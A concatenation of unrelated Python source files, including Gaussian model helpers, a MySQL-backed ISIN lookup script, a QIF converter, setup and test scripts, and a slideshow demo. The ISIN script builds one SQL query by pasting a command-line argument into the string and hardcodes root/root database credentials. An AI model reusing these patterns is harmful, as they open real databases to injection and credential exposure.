return SequentialGaussian_SharedPQ._combine(torch.cat, *argv, dim=dim)
@staticmethod
def _combine(fcn, *argv, dim):
def fn_apply(inputs):
mu, log_sigma = [], []
for g in inputs:
mu.append(g.mu)
log_sigma.append(g.log_sigma)
mu = fcn(mu, dim)
log_sigma = fcn(log_sigma, dim)
return Gaussian(mu, log_sigma)
g1_list = [a.g1 for a in argv]
g2_list = [a.g2 for a in argv]
z1_list = [a.z1 for a in argv]
return SequentialGaussian_SharedPQ(fn_apply(g1_list), fcn(z1_list, dim=dim), fn_apply(g2_list))
def view(self, shape):
# assume that this shape does not include the last dimensions
self._update_shared_dims()
self.g1 = self.g1.view(shape + list(self.g1.shape[self.shared_dims:]))
self.g2 = self.g2.view(shape + list(self.g2.shape[self.shared_dims:]))
self.z1 = self.z1.view(shape + list(self.z1.shape[self.shared_dims:]))
return self
def __getitem__(self, item):
return SequentialGaussian_SharedPQ(self.g1[item], self.z1[item], self.g2[item])
def _update_shared_dims(self):
shared_dims = 0
for i, j in zip(self.g1.shape, self.g2.shape):
if i != j: break
shared_dims += 1
assert shared_dims is not 0 # need at least one shared dim between the Gaussians
self.shared_dims = shared_dims
class ProbabilisticModel:
def __init__(self):
self._sample_prior = False
def switch_to_prior(self):
self._sample_prior = True
def switch_to_inference(self):
self._sample_prior = False
def get_fixed_prior(tensor, bs=None, dim=None):
if dim is not None:
return Gaussian(tensor.new_zeros(bs, dim, 1, 1), tensor.new_zeros(bs, dim, 1, 1))
else:
return Gaussian(torch.zeros_like(tensor.mu), torch.zeros_like(tensor.log_sigma))
def stack(inp, dim):
if isinstance(inp[0], Gaussian):
return Gaussian.stack(*inp, dim=dim)
else:
return torch.stack(inp, dim)
def mc_kl_divergence(p, q, n_samples=1):
"""Computes monte-carlo estimate of KL divergence. n_samples: how many samples are used for the estimate."""
samples = [p.sample() for _ in range(n_samples)]
return torch.stack([p.log_prob(x) - q.log_prob(x) for x in samples], dim=1).mean(dim=1)
if __name__ == "__main__":
d = [Gaussian(torch.tensor([1., 1]), torch.zeros(2)), Gaussian(torch.tensor([-1., -1]), torch.zeros(2))]
d_avg = Gaussian.average(d)
print(d_avg.mu, d_avg.sigma)
|
python
|
#-*- coding: utf-8 -*-
""" Use name to identify share isin by using fondout db and google """
"""
1. Lista pa okända shares vi vill söka isin på.
2. Traversera lista.
3. Kontrollera mot shares
4. Kontrollera mot share_company
5. Kontrollera mot shares LIKE från båda håll min chars 5
6. Kontrollera mot shares_company LIKE från båda håll min chars 5
7. Googla namn + isin.
Jämför google resultat med det vi ev. hittat i databasen.
Om vi väljer google res. på konflikt söker vi baklänges och ser om det
resultatet finns i databasen.
Olika resultatskoder skrivs ut i databasen.
TODO:
- Bryta ut parametrar för gränsvärden i variabler
- Bryt ut lösenord och användarnamn till ENV_VAR
"""
import sys
import mysql.connector
from isingoogle import GoogleIsinSearch
import argparse
import time
from random import randint
import signal
class FindIsin:
def exit_procedure(self):
print "Exiting script..."
self.cnxUp.commit()
self.cursorUp.close()
self.cnxUp.close()
self.cursor.close()
self.connection.close()
sys.exit(0)
def signal_handler(self, signal, frame):
print('You pressed Ctrl+C!')
self.exit_procedure()
def _execute_share_search_query(self, query, name):
cursor = self.connection.cursor(buffered=True)
try:
cursor.execute(query, (name, ))
except mysql.connector.errors.IntegrityError, e:
print ('Find share by name exception:', e)
if (cursor is not None):
self.share = cursor.fetchone()
else:
self.share = None
cursor.close()
return self.share
def _execute_share_search_query_get_all(self, query, name):
cursor = self.connection.cursor(buffered=True)
try:
cursor.execute(query, (name, ))
except mysql.connector.errors.IntegrityError, e:
print ('Find all shares exception:', e)
if (cursor is not None):
self.share = cursor.fetchall()
else:
self.share = None
cursor.close()
return self.share
def _find_by_share_exact_name(self, name):
query = ("SELECT s.name, s.isin FROM share s "
"WHERE s.name = (%s) "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_exact_alias(self, name):
query = ("SELECT sa.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE sa.name = (%s) "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_company_exact_name(self, name):
query = ("SELECT sc.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE sc.name = (%s) "
+ self.QUERY_WHERE_AND +
"GROUP BY sc.name "
+ self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_company_fuzzy_name(self, name):
query = ("SELECT sc.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE sc.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND +
"GROUP BY sc.name "
+ self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_fuzzy_name(self, name):
query = ("SELECT s.name, s.isin "
"FROM share s "
"WHERE s.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_reverse_fuzzy_name(self, name):
query = ("SELECT s.name, s.isin "
"FROM share s "
"WHERE %s like CONCAT('%', s.name, '%') "
"AND length(s.name) > 4 "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_fuzzy_alias(self, name):
query = ("SELECT sa.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE sa.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_reverse_fuzzy_alias(self, name):
query = ("SELECT sa.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE %s like CONCAT('%', sa.name, '%') "
"AND length(sa.name) > 4 "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def _find_by_share_company_reverse_fuzzy_name(self, name):
query = ("SELECT s.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE %s like CONCAT('%', sc.name, '%') "
"AND length(s.name) > 4 "
+ self.QUERY_WHERE_AND +
"group by sc.name "
+ self.QUERY_ORDER +
"LIMIT 1")
return self._execute_share_search_query(query, name)
def share_by_isin(self, isin):
cursor = self.connection.cursor(buffered=True)
query = ("SELECT name FROM share s "
"WHERE isin = (%s) "
"AND (s.category = 1 or s.category is null) "
"LIMIT 1")
try:
cursor.execute(query, (isin, ))
except mysql.connector.errors.IntegrityError, e:
print ('Find share by isin exception:', e)
if (cursor is not None):
share_name = cursor.fetchone()
else:
share_name = None
cursor.close()
return share_name
def share_company_by_isin(self, isin):
cursor = self.connection.cursor(buffered=True)
query = ("SELECT sc.name FROM share s "
"join share_company sc on s.share_company = sc.id "
"WHERE isin = %s ")
try:
cursor.execute(query, (isin, ))
except mysql.connector.errors.IntegrityError, e:
print ('Find share_company by isin exception:', e)
if (cursor is not None):
self.share_company_name = cursor.fetchone()
else:
self.share_company_name = None
cursor.close()
if (self.share_company_name is not None):
self.share_company_name = self.share_company_name[0]
return self.share_company_name
def find_exact_share_routine(self, name):
self.share = None
self.share = self._find_by_share_exact_name(name)
if (self.share is None):
self.share = self._find_by_share_exact_alias(name)
if (self.share is None):
self.share = self._find_by_share_company_exact_name(name)
return self.share
def find_share_routine(self, name):
self.share = None
self.share = self.find_exact_share_routine(name)
# Do not allow fuzzy search on search strings shorter than four letters!
if (len(name) > 3):
if (self.share is None):
self.share = self._find_by_share_fuzzy_name(name)
if (self.share is None):
self.share = self._find_by_share_company_fuzzy_name(name)
if (self.share is None):
self.share = self._find_by_share_fuzzy_alias(name)
if (self.share is None):
self.share = self._find_by_share_reverse_fuzzy_alias(name)
if (self.share is None):
self.share = self._find_by_share_reverse_fuzzy_name(name)
if (self.share is None):
self.share = self._find_by_share_company_reverse_fuzzy_name(
name)
return self.share
def exact_and_fuzzy_routine(self, name):
share = None
share = self.find_exact_share_routine(name)
if(share is None):
share = self.find_share_routine(name)
return share
def all_exact(self, name):
shares = []
for query in self._exact_queries:
shares = shares + self._execute_share_search_query_get_all(query, name)
return shares
def all_fuzzy(self, name):
shares = []
for query in self._fuzzy_queries:
shares = shares + self._execute_share_search_query_get_all(query, name)
return shares
def find_share_alt_name(self, name):
name = name.lower()
share = None
used_names = []
used_names.append(name)
for suffix in self.company_suffix:
new_name = name.replace(suffix, "")
if (new_name not in used_names):
share = self.exact_and_fuzzy_routine(new_name)
used_names.append(new_name)
if (share is None):
new_name = new_name.replace(",", "").replace(".", "")
if (new_name not in used_names):
share = self.exact_and_fuzzy_routine(new_name)
used_names.append(new_name)
if (share is None):
new_name = new_name.replace(" ", "")
if (new_name not in used_names):
share = self.exact_and_fuzzy_routine(new_name)
used_names.append(new_name)
if (share is not None):
break
return share
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
def __init__(self):
self.QUERY_WHERE_AND = ( "AND s.isin IS NOT NULL "
"AND (s.category = 1 or s.category is null) ")
self.QUERY_ORDER = "ORDER BY s.category desc, s.id asc "
self.company_suffix =[' group', '.', ',', ' corporation', ' group', ' plc',
' limited', ' & co.',
' ab', ' a/s', ' oyj', ' asa', ' hf', ' abp',
' incorporated', ' company', ' & company',
' ag', ' (the)', ' and company', ' holdings',
' financial', 'the ', ' corp', ' inc', ' hldgs',
' companies', ' nl', ' se', 's.p.a.', ' spa', 's.a.',
'aktiengesellschaft', ', inc.', ' co. ltd.', 'ltd', 'plc'
'company limited']
self.QUERY_LIMIT = ""
self._find_by_share_exact_name_query = ("SELECT s.name, s.isin FROM share s "
"WHERE s.name = (%s) "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_exact_alias_query = ("SELECT s.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE sa.name = (%s) "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_company_exact_name_query = ("SELECT s.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE sc.name = (%s) "
+ self.QUERY_WHERE_AND +
"GROUP BY sc.name "
+ self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_company_fuzzy_name_query = ("SELECT s.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE sc.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND +
"GROUP BY sc.name "
+ self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_fuzzy_name_query = ("SELECT s.name, s.isin "
"FROM share s "
"WHERE s.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_reverse_fuzzy_name_query = ("SELECT s.name, s.isin "
"FROM share s "
"WHERE %s like CONCAT('%', s.name, '%') "
"AND length(s.name) > 4 "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_fuzzy_alias_query = ("SELECT s.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE sa.name like CONCAT('%', %s, '%') "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_reverse_fuzzy_alias_query = ("SELECT s.name, s.isin "
"FROM share s "
"JOIN share_alias sa on sa.share = s.id "
"WHERE %s like CONCAT('%', sa.name, '%') "
"AND length(sa.name) > 4 "
+ self.QUERY_WHERE_AND + self.QUERY_ORDER + self.QUERY_LIMIT)
self._find_by_share_company_reverse_fuzzy_name_query = ("SELECT s.name, s.isin "
"FROM share_company sc "
"JOIN share s on s.share_company = sc.id "
"WHERE %s like CONCAT('%', sc.name, '%') "
"AND length(s.name) > 4 "
+ self.QUERY_WHERE_AND +
"group by sc.name "
+ self.QUERY_ORDER + self.QUERY_LIMIT)
self._exact_queries = (
self._find_by_share_exact_name_query,
self._find_by_share_exact_alias_query)
# not including SC in exact match.
#self._find_by_share_company_exact_name_query
self._fuzzy_queries = (
self._find_by_share_company_exact_name_query,
self._find_by_share_company_fuzzy_name_query,
self._find_by_share_fuzzy_name_query,
self._find_by_share_reverse_fuzzy_name_query,
self._find_by_share_fuzzy_alias_query,
self._find_by_share_reverse_fuzzy_alias_query,
self._find_by_share_company_reverse_fuzzy_name_query)
# Search database
self.connection = mysql.connector.connect(user='root',
password='root',
database='fondout_maxi')
self.cursor = self.connection.cursor()
# Update database
self.cnxUp = mysql.connector.connect(
user='root',
password='root',
database='fund_search')
self.cursorUp = self.cnxUp.cursor()
self._isin_google = GoogleIsinSearch()
def main(self):
# Parse args from command line
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--fund", help="Fund to use.")
args = parser.parse_args()
# Prepare script to listen to ctrl-c
signal.signal(signal.SIGINT, self.signal_handler)
# --------- Choose selection of shares from database
query_unidentified_shares = (
"SELECT name from tmp_shareholding "
"where isin IS NULL")
# uncomment to enable Test list already caught share-isins / redo everything
if args.fund is not None:
print "Fund used : ", args.fund
query_unidentified_shares = (
"SELECT name from tmp_shareholding "
"where fund = (select id from tmp_fund where name LIKE '%"
+ args.fund + "%')"
" AND isin IS NULL and false_positive = 0")
self.cursorUp.execute(query_unidentified_shares)
unidentifiedShares = self.cursorUp.fetchall()
# --------------------------------------------------------------------------
for (share_name,) in unidentifiedShares:
# lowercase because MYSQL is not case sensitive, but python is.
share_name = share_name.lower()
print "New share: ", share_name
# --------------- Find section ---------------
# First db-search attempt, exact match
found_share = self.find_exact_share_routine(share_name)
if (found_share is not None):
exact_match = True
else:
exact_match = False
# Second db-search attempt, fuzzy search
if (found_share is None):
found_share = self.find_share_routine(share_name)
# Third db-search attempt with alternated name
if (found_share is None):
used_names = []
used_names.append(share_name)
for suffix in self.company_suffix:
new_name = share_name.replace(suffix, "")
if (new_name not in used_names):
found_share = self.find_share_routine(new_name)
used_names.append(new_name)
if (found_share is None):
new_name = new_name.replace(",", "").replace(".", "")
if (new_name not in used_names):
found_share = self.find_share_routine(new_name)
used_names.append(new_name)
if (found_share is None):
new_name = new_name.replace(" ", "")
if (new_name not in used_names):
found_share = self.find_share_routine(new_name)
used_names.append(new_name)
if (found_share is not None):
break
if (exact_match is not True):
(googled_isin,
googled_isin_matches,
google_occurances) = self._isin_google.search_google(share_name)
else:
googled_isin_matches = 0
google_occurances = None
googled_isin = None
if (found_share is not None):
(found_name, found_isin) = found_share
print found_name, found_isin
if (googled_isin_matches > 0):
if (found_isin == googled_isin):
# CASE 1: GOOGLE = DBMATCH --> SAME ISIN
# Database found matches top google result
print 'Found isin matches googled isin, gr8 success!'
found_method = ("1: search and google match. Google hits: "
+ str(googled_isin_matches))
elif (googled_isin_matches > 3):
# CASE 2: GOOGLE(>3) != DBMATCH --> CHOOSE GOOGLE
# No match google hits wins - take google result
found_method = ("2:" + str(googled_isin_matches)
+ " google hits, conflict search " + found_name + " "
+ found_isin)
found_isin = googled_isin
found_name = "googled: "
result = self.share_by_isin(googled_isin)
if (result is not None):
found_name = found_name + ' ' + result[0]
elif (googled_isin_matches > 0):
if (found_isin in google_occurances):
# CASE 3: GOOGLE(<3) != DBMATCH, DBMATCH in GOOG OCCURANC
# ---> CHOOSE DBMATCH
found_method = ("3: mismatch db. top google hit: "
+ googled_isin + ":" + str(googled_isin_matches))
else:
# CASE 4: GOOGLE(<4) != DBMATCH, DBMATCH NOT in GOOG OCCURANC
# found_isin = ""
# found_name = ""
found_method = ("4. mismatch db google("
+ str(googled_isin_matches) + ") not in google results. "
+ googled_isin)
result = self.share_by_isin(googled_isin)
if (result is not None):
found_method = (found_method + ' db-matched to ' +
result[0])
elif (exact_match is True):
# CASE 8: EXACT MATCH
found_method = "8: Exact match"
else:
# CASE 2: No google hits, but found in DB
# Make this a separate case?
found_method = "2: No google hits"
elif (googled_isin_matches > 0):
# min 3 google hits makes certain
if (googled_isin_matches > 2):
found_isin = googled_isin
# Search current db for found isin.
result = self.share_by_isin(googled_isin)
found_method = ("5:" + str(googled_isin_matches)
+ " results googled, faild db-search.")
found_name = "googled: "
if (result is not None):
found_name = found_name + result[0]
else:
found_method = ("6. Google hits: " + str(googled_isin_matches)
+ " : " + googled_isin)
result = self.share_by_isin(googled_isin)
if (result is not None):
found_method = found_method + ' db-matched to ' + result[0]
found_isin = ""
found_name = ""
else:
found_isin = ""
found_name = ""
found_method = "7: Nothing found!"
# Get share_company
found_share_company = ""
if(found_isin != ""):
found_share_company = self.share_company_by_isin(found_isin)
# --------------- Update section ---------------
query_update_isin = (
"UPDATE tmp_shareholding "
"SET matched_name=%s, isin=%s, method_found=%s, share_company=%s "
"WHERE name = %s")
update_share_values = (found_name, found_isin, found_method,
found_share_company, share_name)
# If fund is specified add specific by fund.
# obs: Should really be the exact one pulled from the database
if args.fund is not None:
query_update_isin = (
query_update_isin +
" and fund = (select id from tmp_fund "
"where name like CONCAT('%', %s, '%'))")
update_share_values = update_share_values + (args.fund, )
# Update share in fund_search where name = share_name
try:
self.cursorUp.execute(query_update_isin, update_share_values)
except Exception as e:
print('Update execution error', e)
# Use commit for confirming modification of data.
# Rollback to undo.
# Disable for test.
self.cnxUp.commit()
time.sleep(randint(0,10))
self.exit_procedure()
if __name__ == "__main__":
findIsin = FindIsin()
findIsin.main()
|
python
|
"""Provides conversion for transaction data into an exchange format."""
import textwrap
import time
from powl import exception
class TransactionConverter(object):
"""
Provides methods to convert data into a financial exchange format.
"""
def convert(self, date, debit, credit, amount, memo):
"""
Convert a transaction into an exchange financial format.
Parameters
----------
date : time.struct_time
Date of the transaction.
debit : str
Debit account of the transaction.
credit : str
Credit account of the transaction.
amount : float
Amount of the transaction.
memo : str
Description of the transaction.
"""
pass
class QifConverter(TransactionConverter):
"""
Provides methods to convert a transaction into QIF format.
"""
def __init__(self, log, files, account_types, assets, liabilities,
revenues, expenses):
"""
Parameters
----------
log : powl.log.Log
Used to log.
files : dict of powl.filesystem.File
Map of account key to files. Every key in files must exist in
either of assets, liabilities, revenues, or expenses.
account_types : dict
Map of account key to QIF account types.
assets : dict
Map of account key to Assets.
liabilities : dict
Map of account key to Liabilitess.
revenues : dict
Map of account key to Revenuess.
expenses : dict
Map of account key to Expensess.
Notes
-----
An account key is a string that maps to a QIF account.
Multiple account key words can map to the same account.
For example "ent" can map to "Expenses:Entertainment" and
"entertainment" can also map to "Expenses:Entertainment".
Raises
------
ValueError
If a key is files does not have a key in any of assets,
liabilities, revenues, or expenses.
"""
self._log = log
self._files = files
self._account_types = account_types
self._assets = assets
self._liabilities = liabilities
self._revenues = revenues
self._expenses = expenses
self._accounts = dict(self._assets.items() +
self._liabilities.items() +
self._revenues.items() +
self._expenses.items())
for key, value in self._files.items():
if key not in self._accounts.keys():
msg = ("account key ({0}) ".format(key) +
"for file ({0}) ".format(value.filename) +
"does not have has an associated QIF account")
err = exception.create(ValueError, msg)
raise err
def convert(self, date, debit, credit, amount, memo):
"""
Convert transaction data into QIF format.
Parameters
----------
date : time.struct_time
Date of the transaction.
debit : str
Debit account of the transaction.
credit : str
Credit account of the transaction.
amount : float
Amount of the transaction.
memo : str
Description of the transaction.
Returns
-------
record : str
QIF record of the transaction.
qif_file : powl.filesystem.File
The QIF file to output to.
Notes
-----
Since it depends which QIF file records the transaction, the return
value also contains the file to write to.
"""
qif_date = self._format_date(date)
qif_transfer = self._get_transfer_account(debit, credit)
qif_amount = self._format_amount(debit, amount)
qif_memo = memo
qif_record = self._format_qif_record(qif_date, qif_transfer,
qif_amount, qif_memo)
qif_file = self._get_qif_file(debit, credit)
self._log_transaction(qif_date, qif_file.filename, qif_transfer,
qif_amount, qif_memo)
return qif_record, qif_file
def _create_qif_templates(self):
templates = []
for key, filename in self.filenames.iteritems():
account_name = self.accounts.get(key)
account_type = self.types.get(key)
header = self._format_qif_header(account_name, account_type)
template = (filename, header)
templates.append(template)
return templates
def _format_amount(self, debit, amount):
"""
Convert amount to QIF format based on debit.
Parameters
----------
debit : str
Account key for the debit of a transaction.
amount : str or float
Amount of the transaction.
Returns
-------
str
Formatted amount to use in QIF file.
Raises
------
ValueError
If amount cannot be converted to a float.
KeyError
If debit key is not an account.
"""
try:
formatted_amount = "{0:.2f}".format(float(amount))
except ValueError as err:
msg = "amount ({0}) cannot be converted to float".format(amount)
exception.add_message(err, msg)
raise
if debit in self._expenses:
# Amount should be negative.
return '-' + formatted_amount
elif debit in self._accounts:
return formatted_amount
else:
msg ="account key ({0}) does not exist".format(debit)
err = exception.create(KeyError, msg)
raise err
def _format_date(self, date):
"""
Convert struct_time to QIF date format (MM/DD/YYYY).
Parameters
----------
date : time.struct_time
The date of the transaction.
Returns
-------
str
String date in the format of "MM/DD/YYYY".
Raises
------
TypeError
If date is not a struct_time.
ValueError
If a date value is out of range.
OverflowError
If a value in the tuple is too large to be stored in a C long.
"""
try:
return time.strftime("%m/%d/%Y", date)
except (ValueError, TypeError, OverflowError) as err:
msg = ("date ({0}) cannot be converted ".format(date) +
"to MM/DD/YYYY ")
exception.add_message(err, msg)
raise
def _format_qif_header(self, account_name, account_type):
"""Format an account name and type into a header for a QIF file."""
data = { 'name': account_name, 'type': account_type }
header = textwrap.dedent("""\
!Account
N{name}
T{type}
^
!Type:{type}""".format(**data))
return header
def _format_qif_record(self, date, transfer, amount, memo):
"""
Formats qif data into a transaction for a QIF file.
Parameters
----------
date : str
Date of the transaction
transfer : str
Transfer QIF account.
amount : str
Formatted amount.
memo : str
Description of the transaction.
"""
return textwrap.dedent(
"""\
D{0}
T{1}
L{2}
M{3}
^""".format(date, amount, transfer, memo))
def _get_qif_file(self, debit, credit):
"""
Get the associated QIF file from the debit and credit keys.
Parameters
----------
debit : str
Account key for the debit of a transaction.
credit : str
Account key for the credit of a transaction.
Raises
------
KeyError
If neither key has an associated QIF file.
Notes
-----
Debit key has priority so if both debit and credit key has an
associated QIF file than the QIF file associated with the debit
key is returned.
This is linked with get_transfer_account. If the QIF file returned
from this is from the debit key then the transfer account must be
from the credit key and vice versa.
"""
if debit in self._files:
return self._files[debit]
elif credit in self._files:
return self._files[credit]
else:
msg = ("neither debit key ({0}) ".format(debit) +
"or credit key ({0}) ".format(credit) +
"has an associated QIF file")
err = exception.create(KeyError, msg)
raise err
def _get_transfer_account(self, debit, credit):
"""
Get the associated QIF account from the debit and credit keys.
Parameters
----------
debit : str
Account key for the debit of a transaction.
credit : str
Account key for the credit of a transaction.
Raises
------
KeyError
If neither key has an associated QIF file.
If neither key has an associated QIF account.
Notes
-----
Credit key has priority so if both debit and credit key has an
associated QIF account than the QIF account associated with the
credit key is returned.
This is linked with get_qif_file. If the transfer account returned
from this is from the credit key then the QIF file must be from the
debit key and vice versa.
"""
if debit in self._files:
key = credit
elif credit in self._files:
key = debit
else:
msg = ("neither debit key ({0}) ".format(debit) +
"or credit key ({0}) ".format(credit) +
"has an associated QIF file")
err = exception.create(KeyError, msg)
raise err
if key in self._accounts:
return self._accounts[key]
else:
msg = ("account key ({0}) ".format(key) +
"does not have has an associated QIF account")
err = exception.create(KeyError, msg)
raise err
def _log_transaction(self, date, filename, transfer, amount, memo):
"""
Debug logs the transaction.
Parameters
----------
date : str
Date of the transaction
filename : str
Name of the QIF file.
transfer : str
Transfer QIF account.
amount : str
Formatted amount.
memo : str
Description of the transaction.
"""
self._log.debug("QIF transaction:")
self._log.debug(" date: %s", date)
self._log.debug(" file: %s", filename)
self._log.debug(" transfer: %s", transfer)
self._log.debug(" amount: %s", amount)
self._log.debug(" memo: %s", memo)
|
python
|
#!/usr/bin/env python
# pylint: disable=wrong-import-position
import os
import subprocess
import sys
import tempfile
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
from xv_leak_tools.helpers import current_os
if len(sys.argv) != 2:
sys.stderr.write("USAGE: setup_python.py virtualenv_location\n")
sys.exit(1)
def bin_path():
if current_os() == 'macos':
return '/usr/local/bin/'
return '/usr/bin/'
def install_python_if_not_present(location):
if os.path.exists(os.path.join(location, 'bin', 'activate')):
print("Virtualenv already setup in {}".format(location))
return
print("Creating virtualenv")
cmd = [
os.path.join(bin_path(), 'virtualenv'),
'-p',
os.path.join(bin_path(), 'python3'),
location
]
print("Executing: {}".format(" ".join(cmd)))
subprocess.check_output(cmd)
write_pythonlocation(location)
def install_pip_packages():
if sys.platform == 'linux' or sys.platform == 'linux2':
requirements = 'requirements_linux.txt'
elif sys.platform == 'darwin':
requirements = 'requirements_macos.txt'
elif sys.platform == 'cygwin':
requirements = 'requirements_windows.txt'
else:
raise Exception("Unsupported system: {}".format(sys.platform))
print("Installing pip packages using {}".format(requirements))
script = '''\
source activate
pip3 install -r {}
'''.format(requirements)
_file, script_file = tempfile.mkstemp()
with os.fdopen(_file, 'w') as _file:
_file.write(script)
print("Wrote temp file to {}".format(script_file))
try:
for line in subprocess.check_output(['bash', script_file]).splitlines():
print(line.decode())
except subprocess.CalledProcessError as ex:
print("FAILED: {}".format(ex))
sys.exit(1)
def write_pythonlocation(location):
with open('.pythonlocation', 'w') as _file:
_file.write(location)
LOCATION = sys.argv[1]
print("Setting up python in {}".format(LOCATION))
install_python_if_not_present(LOCATION)
# Write the python location first as the pip step relies on it
write_pythonlocation(LOCATION)
# We always install pip packages so that updates from the repo get picked up. On the build machines
# this is very useful. It's cheap to pip install if everything is already installed.
install_pip_packages()
|
python
|
from otd.skosnavigate import SKOSNavigate
from similarity.csv_parse import get_fragment
from utils.graph import create_bound_graph
def sort_turtle(prefix, identifiers, file_in, file_out):
with open(file_in, encoding='utf8') as fd:
line_iter = iter(fd)
entities = dict()
preamble_finished = False
preamble = []
while not preamble_finished:
line = next(line_iter)
preamble.append(line)
if line.strip() == "":
preamble_finished = True
extra = []
try:
while True:
line = next(line_iter)
if line.strip == "":
# Extra blank lines between entities
continue
if not line.startswith(prefix):
# We don't recognize this, just put it in the end
extra.append(line)
continue
# If we are here, then we recognize this line as the first for a
# subject. Its identifier is from after the prefix, until space.
this_id = line.split()[0][len(prefix):]
this_entitity = []
entities[this_id] = this_entitity
# do-while loop
this_entitity.append(line)
while line.strip() != "":
line = next(line_iter)
this_entitity.append(line)
except StopIteration:
# End of file
pass
# Add to file in order given by identifiers
sorted_lines = list()
sorted_lines.extend(preamble)
for ent_id in identifiers:
if ent_id in entities:
sorted_lines.extend(entities[ent_id])
entities.pop(ent_id)
else:
print('Identifier', ent_id, 'not found in turtle file')
remaining_entities = sorted(entities.items())
for _, lines in remaining_entities:
sorted_lines.extend(lines)
if extra:
sorted_lines.append('\n')
sorted_lines.extend(extra)
with open(file_out, mode="w", encoding="utf8") as fd:
fd.writelines(sorted_lines)
def get_concepts_sorted(file_in):
identifiers = []
g = create_bound_graph()
g.parse(location=file_in, format="turtle")
navigator = SKOSNavigate(g)
def do_node(node, visited_nodes):
identifiers.append(get_fragment(str(node)))
children = tuple(sorted(navigator.find_children(node)))
if node not in visited_nodes and len(children):
for child in children:
do_node(child, visited_nodes | {node})
elif node in visited_nodes:
print('Cycle detected for nodes', visited_nodes, 'at node', node)
do_node(navigator.find_root(), set())
return identifiers
|
python
|
import pytest
from ee.clickhouse.queries.groups_join_query import GroupsJoinQuery
from posthog.models.filters import Filter
def test_groups_join_query_blank():
filter = Filter(data={"properties": []})
assert GroupsJoinQuery(filter, 2).get_join_query() == ("", {})
def test_groups_join_query_filtering(snapshot):
filter = Filter(
data={"properties": [{"key": "industry", "value": "finance", "type": "group", "group_type_index": 0}]}
)
assert GroupsJoinQuery(filter, 2).get_join_query() == snapshot
def test_groups_join_query_filtering_with_custom_key_names(snapshot):
filter = Filter(
data={
"properties": [
{"key": "industry", "value": "finance", "type": "group", "group_type_index": 0},
{"key": "company", "value": "crashed", "type": "group", "group_type_index": 2},
]
}
)
assert GroupsJoinQuery(filter, 2, join_key="call_me_industry").get_join_query() == snapshot
|
python
|
import sys
from tkinter import *
from slideShow import SlideShow
if len(sys.argv) == 2:
picdir = sys.argv[1]
else:
picdir = '../gifs'
root = Tk()
Label(root, text="Two embedded slide shows: each side uses after() loop").pack()
SlideShow(msecs=200,
parent=root, picdir=picdir, bd=3, relief=SUNKEN).pack(side=LEFT)
SlideShow(msecs=200,
parent=root, picdir=picdir, bd=3, relief=SUNKEN).pack(side=RIGHT)
root.mainloop()
|
python
|
class Transform(object):
"""Transform coordinate systems: scale / translate"""
def __init__(self, scale, translate):
"""Set up the parameters for the transform"""
self.scale = scale
self.translate = translate
def forward(self, pt):
"""From the original box to (-1,-1),(1,1) box """
return (pt[0] - self.translate[0]) / self.scale[0], \
(pt[1] - self.translate[1]) / self.scale[1]
def backward(self, pt):
"""From the (-1,-1),(1,1) box back to the original box"""
return (pt[0] * self.scale[0]) + self.translate[0], \
(pt[1] * self.scale[1]) + self.translate[1]
def get_transform(box):
"""Get a transform object for a bounding box to transform to (-1,-1),(1,1)
"""
# target = ((-1.,-1.),(1.,1.))
# tcx, tcy = (0., 0.)
tdx, tdy = (2., 2.)
(sxmin, symin), (sxmax, symax) = box
scx, scy = (sxmin + sxmax) * 0.5, (symin + symax) * 0.5
sdx, sdy = (sxmax - sxmin), (symax - symin)
scale = max(sdx / tdx, sdy / tdy)
# print("scale {}".format(scale))
return Transform((scale, scale), (scx, scy))
def get_box(pts):
"""Returns tight fitting bounding box (axis aligned) around set of points
"""
assert len(pts)
it = iter(pts)
ll = list(next(it))
ur = list(ll[:])
for pt in it:
if pt[0] < ll[0]:
ll[0] = pt[0]
if pt[1] < ll[1]:
ll[1] = pt[1]
if pt[0] > ur[0]:
